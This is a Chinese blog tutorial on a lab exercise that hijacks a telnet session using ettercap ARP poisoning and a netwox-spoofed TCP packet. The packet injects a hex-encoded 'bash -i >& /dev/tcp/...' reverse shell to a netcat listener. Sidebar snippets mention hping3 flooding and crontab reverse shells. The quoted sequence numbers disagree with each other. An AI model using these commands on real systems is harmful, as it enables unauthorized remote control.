使用Ubuntu和kali来实现Tcp劫持和反弹Shell攻击(从零开始实验)

已于 2022-11-23 19:42:26 修改
阅读量2.3k 收藏 10
点赞数 4
分类专栏: 网络空间安全协议实验 文章标签: 网络协议 网络 安全 ubuntu 网络安全
于 2022-11-20 16:05:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52127042/article/details/127949652
版权

前期准备

  1. 准备一台Ubuntu虚拟机 ubuntu20.04

ubuntu20.04 解压即用 已安装vm-tools 用户名base密码base apt已换源

  1. 克隆出另一台Ubuntu
    如果无法从主机复制粘贴到Ubuntu,执行以下命令并重启
sudo apt install open-vm-tools-desktop
  1. 准备一台kali
  2. 由于Ubuntu无Wireshark,所以需要在软件商店里安装Wireshark,kali自带Wireshark。
  3. Ubuntu配置telnet
  4. kali安装netwox
sudo apt-get install netwox

如果报错,使用sudo apt-get update,若还不行,使用sudo apt-get upgrade

使用ifconfig -a命令时,如果失败,则按系统提示的命令执行

实验环境

  1. 实验环境:使用两台Ubuntu主机做服务和响应端以及一台Kali做攻击:

Ubuntu base的ip地址是192.168.147.134

在这里插入图片描述

Ubuntu 1 的ip地址是 192.168.147.135

在这里插入图片描述

Kali 的ip地址是192.168.147.129

在这里插入图片描述

实验拓扑

在这里插入图片描述

启动抓包工具

  1. 分别在三台机器上启动wireshark,抓本机所在网卡

注意:三台机器的wireshark所抓网卡从ifconfig -a命令中得到。

启动ettercap

  1. 在kali中启动ettercap graphical,对其进行设置,开启ARP攻击。

(1) 先点击Accept,在ettercap menu中选择Hosts中的Hosts list和Scan for hosts
(2) 选择ip地址是 server 的ip,点击Add to Target1;选择ip地址是 client的ip,点击Add to Target2
(3) 再点击EITM menu中的ARP posioning直接点击OK

使用telnet命令

4.在server 中使用telnet命令去telnet另一台 client主机
在这里插入图片描述

分析包中数据

  1. 在kali的wireshark抓包中找到类型是telnet的最后一个数据包或者是最后一个类型是TCP的Retransmission的数据包。

在这里插入图片描述

  1. 因为要伪造TCP包,所以要将TCP报文的协议首选项中的计算seqnumber的默认选项勾掉,不让它默认给我们计算

对一个tcp包,右键点击protocal perferences,取消图中箭头所指的方框。

在这里插入图片描述

  1. 如图所示:从包的数据中得到src_ip、dst_ip、src_port、seqnum、acknum

telnet默认端口是23(即dst_port)

在这里插入图片描述

本次实验所抓数据包中数据提取为:
Src_port:54440
Seqnum:2978828188
Acknum:1961176702

监听kali端口,使用netwox

  1. 利用nc -lnvp命令监听kali的端口(端口不固定)
nc -lnvp 9999

另起一个终端,利用netwox的40号工具伪装tcp报文攻击主机

构造netwox所需攻击命令

  1. 利用cyberchef中的to hex工具构建shellcode:

    反弹Shell命令:

bash -i>&/dev/tcp/ip地址/port 0>&1

将kali的ip地址以及kali所开放的端口按格式填入,将其转换为十六进制

如图所示:
在这里插入图片描述
本次实验的shellnode为:

62617368202d693e262f6465762f7463702f3139322e3136382e3134372e3132392f3939393920303e26310d00

攻击命令格式:
sudo netwox 40 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 'IP_addr' --ip4-dst 'IP_addr' --tcp-src 'port' --tcp-dst 'port' --tcp-seqnum '数值' --tcp-acknum '数值' –tcp-ack --tcp-psh --tcp-window 227 --tcp-data 'shellnode'
0d00在末尾加上表示执行

本次实验攻击命令为:

sudo netwox 40 --ip4-ttl 128 --ip4-protocol 6 --ip4-src 192.168.147.134 --ip4-dst 192.168.147.135 --tcp-src 54440 --tcp-dst 23 --tcp-seqnum 2978228188 --tcp-acknum 1961176702 --tcp-ack --tcp-psh --tcp-window 227 --tcp-data 62617368202d693e262f6465762f7463702f3139322e3136382e3134372e3132392f3939393920303e26310d00

实验结果

在这里插入图片描述

攻击成功,成功进入另一台主机

在这里插入图片描述

鹤不归十九
关注
专栏目录
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
[网络安全自学篇] 六十.Cracer第八期——(2)五万字总结Linux基础知识和常用渗透命令
热门推荐
杨秀璋的专栏
03-19 1万+
作为Web渗透的初学者,Linux基础知识和常用命令是我们的必备技能,本文详细讲解了Linux相关知识点及Web渗透免了高龄。如果想玩好Kali或渗透,你需要学好Linux及相关命令,以及端口扫描、漏洞利用、瑞士军刀等工具。安全领域通常分为网络安全(Web渗透)和系统安全(PWN逆向)两个方向。非常基础的一篇文章,希望能够帮助到您!
通过KALI发起拒绝攻击
我不是猫叔
09-06 3354
通过使用Hping3发发起拒绝服务攻击(使得目标主机瘫痪) 成立攻击组织,搭建攻击网络环境 kali IP 10.117.10.111 目标主机 IP 10.117.0.15 使用工具Hping3 该工具使用方法种类很多可以使用它来测试目标主机防火墙,也可以发起拒绝服务攻击,同时也可以路由跟踪,网络检测工具。 普通攻击 hping -S --flood -V 10.117.0.1...
Ubuntu15.10安装Kali Linux渗透工具
01-09
首先脚本是开源的,所以我将要分享给大家!   Katoolin   它是一个非常好的用于渗透测试的Linux发行版。但通常我们需要在电脑上安装一个完整的Kali Linux才能使用它各种各样的工具。LionSec开发出了一个python工具,叫做Katoolin,它可以让你在其他Linux发行版上使用Kali的全部工具。目前仅支持ubuntu,其他发行版会陆续支持。   ubuntu如何安装Katoolin   首先你的ubuntu需要安装有python2.7,ubuntu15.04以前的版本都是2.7。近发布的ubuntu15.10默认python版本为3.5。使用下面的命令
Ubuntu反弹shell的思考
最新发布
求大佬师傅带
07-02 1052
相信各位师傅在平时渗透过程中会遇到ubuntu任务计划反弹shell失败的情况,本文就这一问题浅析一下。
ubuntu利用crontab反弹shell
qq_68163788的博客
11-14 1065
Ubuntu中,反弹shell是指在远程服务器上建立一个与本地计算机的交互式连接,以便可以在远程服务器上执行命令和操作。这种连接通常是通过网络进行的,允许用户在不直接登录到远程服务器的情况下,进行远程管理和操作。 反弹shell通常使用一些常见的工具和技术来实现,包括SSH、Netcat、Metasploit等。用户可以在本地计算机上直接操作远程服务器,执行命令、浏览文件等操作。需要注意的是,反弹shell可能存在安全风险,因此在实际使用中应当谨慎操作,并确保对服务器进行充分的安全防护。
实现ubuntu的任务计划反弹shell
m0_65522694的博客
07-02 321
也就是说linux中cron的命令执行的shell环境是/bin/sh 查看后发现,sh指向dash的软连接,由于dash的shell是没有交互能力的,所以将sh的软连接修改为bash。作用:是将一个交互式的bash shell的输出和错误发送到kali的8888端口,并将输入也从该端口读取。在ubuntu的系统中使用crontab -e命令编写计划任务。使用tail -f /var/log/syslog查看日志。然后居然不存在这个文件夹 /bin/bash。使用Ubuntu定时任务反弹shell
ubuntu的redis反弹shell总结
qq_15042405的博客
02-25 1354
ubuntu的redis反弹shell总结 ubuntu要执行有三点: 1、ubuntu的默认执行命令的为/bin/dash,我们使用bash -i肯定是弹不了的。 2、ubuntu计划任务运行有语法要求,redis写入的文件存在缓存数据,导致语法错误无法运行计划任务。 3、文件需要是600 rw权限,权限不对也不能运行,不过我直接写入貌似就是600 rw。 参考链接:http://www.vkxss.top/2019/05/28/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-R
运维和shell
DoubleJing的博客
01-09 514
什么是运维 术语名词 IDC–(Internet Data Center)互联网数据中心,主要服务包括整机租用、服务器托管、机柜租用、机房租用、专线接入和网络管理服务等。广义上的IDC业务,实际上就是数据中心所提供的一切服务。客户租用数据中心的服务器和带宽,并利用数据中心的技术力量,来实现自己对软、硬件的要求,搭建自己的互联网平台,享用数据中心所提供的一系列服务。 ISP–(Internet Service Provider)互联网服务提供商,即向广大用户综合提供互联网接入业务、信息业务、和增值业务的电
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
[网络安全自学篇] 九十一.阿里云搭建LNMP环境及实现PHP自定义网站IP访问 (1)
杨秀璋的专栏
07-25 6338
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。本文主要分享作阿里云搭建LNMP环境及实现PHP自定义网站IP访问,同时详细介绍走过的坑,还发了朋友圈求助大家,再次感谢。本来想重新设置一个专栏分享基于阿里云的PHP网站搭建,但考虑到搞安全的也会面临各种靶场及个人网站搭建的情况,所以将这篇文章放置在“网络安全自学篇”中,后续还会分享PHP如何记录后台IP及Python定位经纬度等知识,希望对您有所帮助~
图解HTTP 十一、Web的攻击技术
ziggy7的博客
12-01 309
针对Web的攻击技术  互联网的攻击大多是冲着Web站点来的。 HTTP不具备必要的安全功能  HTTP在安全性方面较为劣势。 在客户端可篡改请求   针对Web应用的攻击模式 ●主动攻击攻击者直接访问Web应用,把攻击代码传入。需要攻击者能够访问那些资源。如SQL注入和OS命令注入攻击。 ●被动攻击:是指利用圈套策略执行攻击代码的攻击模式。在被动攻击过程,攻击者不直接对目标Web应用访问发起攻击。 其余见 https://blog.csdn.net/u010150046/article/detai
Ubuntu kill命令用法详解
zzsg2005的专栏
02-23 1198
Ubuntu kill命令用法详解 Posted by Fcola on 2009/08/17 Leave a comment (1)Go to comments 1. kill 作用:根据进程号杀死进程 用法: kill [信号代码] 进程ID root@fcola:/# ps -ef | grep sendmail smmsp
浅谈反弹shell
weixin_53284312的博客
01-12 2499
反弹shell
ubuntu安装kali linux工具,Ubuntu安装Kali工具集:Katoolin
weixin_35712223的博客
05-05 6568
在真实渗透环境下往往需要一个稳定、安全、可随时操作的环境,家中的电脑不能一直开着,而且还有解决公网IP的问题,这时候我们往往需要一台vps,但是市面上的vps往往并不支持安装kali系统,只有某些较贵的KVM构架vps可以不太稳定的安装kali系统,其他linux系统支持的渗透测试软体也并不全面,于是今天我为大家介绍一款可以直接在常见Ubuntu设备上安装全部kali工具集的程序katoolin。...
TCP劫持攻击
Hala
03-16 2949
思路: Hacker获取到Client与Server的TCP会话包(ARP毒化、或者MAC洪范攻击等) 观察Server发给Client的最后一个TCP报文 Hacker通过数据包伪造出一个TCP报文,这个报文是Client回给Server的TCP数据包 a.二层的source-mac是hacker机 b.三层的ip source是Client主机的IP,目标是Server的IP c.四...
ubuntu安装kali linux工具,Katoolin–在Ubuntu上安装Kali Linux工具集
weixin_35097945的博客
05-05 1826
Katoolin(https://github.com/LionSec/katoolin)是一个Python脚本,它可以实现在Debian/Ubuntu上自动安装Kali Linux中的工具。如果你不知道Kali Linux是神马,看这里。这篇文章记录在Ubuntu 16.04上安装使用katoolin的步骤。Katoolin的主要特性:添加Kali Linux软件仓库删除Kali Linux软件...
Ubuntu杀手锏命令
yyqhwr的博客
06-13 169
常用命令 Ubuntu GNOME快捷键 Ctrl+Alt+T (打开GNOME终端窗口)
Kali Linux虚拟机详细安装教程:从零开始至图形化安装
本篇文档详细介绍了如何在虚拟机中安装Kali Linux,这是一款专门为安全审计、渗透测试和网络安全教育设计的操作系统。下面是安装步骤的详细解读: 1. **新建虚拟机**:首先,用户需在虚拟机软件(如VMware或...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值